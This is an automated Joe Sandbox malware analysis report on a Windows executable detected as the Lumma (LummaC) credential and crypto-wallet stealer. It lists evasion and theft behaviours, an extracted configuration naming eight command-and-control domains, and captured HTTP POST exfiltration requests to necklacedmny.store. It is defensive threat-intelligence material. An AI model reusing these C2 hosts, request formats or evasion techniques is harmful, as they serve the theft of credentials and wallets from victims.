Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1544423
MD5:dc20ee0ac31f3e17cbd727de4644f7aa
SHA1:7b688e73f50ac2a4241681e996410efeec4e0775
SHA256:d20226e20ceb5d5f0440c642f10506fbdceaa23e3c598478118e46f0dd932990
Tags:exeuser-Bitsight
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Detected potential crypto function
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2736 cmdline: "C:\Users\user\Desktop\file.exe" MD5: DC20EE0AC31F3E17CBD727DE4644F7AA)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["necklacedmny.store", "founpiuer.store", "thumbystriw.store", "presticitpo.store", "navygenerayk.store", "crisiwarny.store", "scriptyprefej.store", "fadehairucw.store"], "Build id": "4SD0y4--legendaryy"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2543832248.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.2544005509.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2571721214.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2556757347.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2575722256.0000000000DB8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 5 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T12:04:10.277153+010020546531A Network Trojan was detected192.168.2.649709188.114.96.3443TCP
              2024-10-29T12:04:12.556685+010020546531A Network Trojan was detected192.168.2.649710188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T12:04:10.277153+010020498361A Network Trojan was detected192.168.2.649709188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T12:04:12.556685+010020498121A Network Trojan was detected192.168.2.649710188.114.96.3443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-10-29T12:04:50.576456+010020480941Malware Command and Control Activity Detected192.168.2.649712188.114.96.3443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Found malware configuration
              Source: file.exe.2736.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["necklacedmny.store", "founpiuer.store", "thumbystriw.store", "presticitpo.store", "navygenerayk.store", "crisiwarny.store", "scriptyprefej.store", "fadehairucw.store"], "Build id": "4SD0y4--legendaryy"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: scriptyprefej.store
              Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: navygenerayk.store
              Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: founpiuer.store
              Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: necklacedmny.store
              Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: thumbystriw.store
              Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: fadehairucw.store
              Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: crisiwarny.store
              Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: presticitpo.store
              Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.3075411621.00000000000D1000.00000040.00000001.01000000.00000003.sdmpString decryptor: 4SD0y4--legendaryy
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49899 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49908 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49919 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49989 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49992 version: TLS 1.2
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\3D ObjectsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49709 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49710 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49710 -> 188.114.96.3:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49712 -> 188.114.96.3:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: necklacedmny.store
              Source: Malware configuration extractorURLs: founpiuer.store
              Source: Malware configuration extractorURLs: thumbystriw.store
              Source: Malware configuration extractorURLs: presticitpo.store
              Source: Malware configuration extractorURLs: navygenerayk.store
              Source: Malware configuration extractorURLs: crisiwarny.store
              Source: Malware configuration extractorURLs: scriptyprefej.store
              Source: Malware configuration extractorURLs: fadehairucw.store
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 52Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12864Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15110Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19968Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1227Host: necklacedmny.store
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 571410Host: necklacedmny.store
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: presticitpo.store
              Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
              Source: global trafficDNS traffic detected: DNS query: fadehairucw.store
              Source: global trafficDNS traffic detected: DNS query: thumbystriw.store
              Source: global trafficDNS traffic detected: DNS query: necklacedmny.store
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
              Source: file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.2571986985.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2573744183.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2738702991.0000000000D96000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3066838400.0000000000D9B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575338025.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2573224522.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2572097729.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575405463.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2572367724.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2556757347.0000000000D95000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575066058.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2574473643.0000000000D94000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2572707975.0000000000D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
              Source: file.exe, 00000000.00000003.2728000075.0000000000D93000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2727444417.0000000000D94000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft7_6
              Source: file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.2557292476.00000000056DD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: file.exe, 00000000.00000003.2571567773.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
              Source: file.exe, 00000000.00000003.2571567773.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
              Source: file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: file.exe, 00000000.00000003.2571567773.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
              Source: file.exe, 00000000.00000003.2571567773.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: file.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: file.exe, 00000000.00000003.2738122646.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3066757426.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074641701.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2727357507.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3067139929.0000000000DBE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571721214.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543874982.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575762347.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543744659.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543987937.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.3078400834.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3078611352.0000000000DC0000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575722256.0000000000DB8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2727984519.0000000000DBF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/
              Source: file.exe, 00000000.00000003.2543874982.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543744659.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543987937.00000000055E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store//tL
              Source: file.exe, 00000000.00000003.2543874982.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543744659.00000000055E0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543987937.00000000055E3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/?t
              Source: file.exe, 00000000.00000003.2727198196.0000000000DC7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2543832248.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571721214.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2544005509.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.3078545799.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3066838400.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575762347.0000000000DBF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2556757347.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3067227914.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575722256.0000000000DB8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2575781246.0000000000DC6000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074900273.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2556801144.0000000000DB7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D43000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2738702991.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api
              Source: file.exe, 00000000.00000002.3078545799.0000000000D83000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074900273.0000000000D82000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D43000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api#
              Source: file.exe, 00000000.00000003.2543832248.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2544005509.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api&
              Source: file.exe, 00000000.00000003.2543832248.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2544005509.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api3
              Source: file.exe, 00000000.00000003.2738122646.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2738499845.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3067105492.0000000000DC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/api=
              Source: file.exe, 00000000.00000003.2571721214.0000000000DB7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apia8&_Z
              Source: file.exe, 00000000.00000002.3078400834.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apidb
              Source: file.exe, 00000000.00000003.2738122646.0000000000DBD000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2738499845.0000000000DC4000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3067105492.0000000000DC7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apik
              Source: file.exe, 00000000.00000003.3066838400.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3067227914.0000000000DAB000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2738702991.0000000000DAB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store/apis
              Source: file.exe, 00000000.00000003.3074720588.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/api
              Source: file.exe, 00000000.00000002.3078400834.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/api.default-release/key4.dbPK
              Source: file.exe, 00000000.00000002.3078400834.0000000000D2E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.3074720588.0000000000D2E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://necklacedmny.store:443/apiK
              Source: file.exe, 00000000.00000003.2558209669.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.2558209669.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000000.00000003.2571567773.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
              Source: file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.2165416939.0000000005619000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000000.00000003.2558090375.000000000561C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: file.exe, 00000000.00000003.2558090375.000000000561C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: file.exe, 00000000.00000003.2558209669.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: file.exe, 00000000.00000003.2558209669.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: file.exe, 00000000.00000003.2558209669.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.2571567773.00000000055E3000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2571664086.00000000055E7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
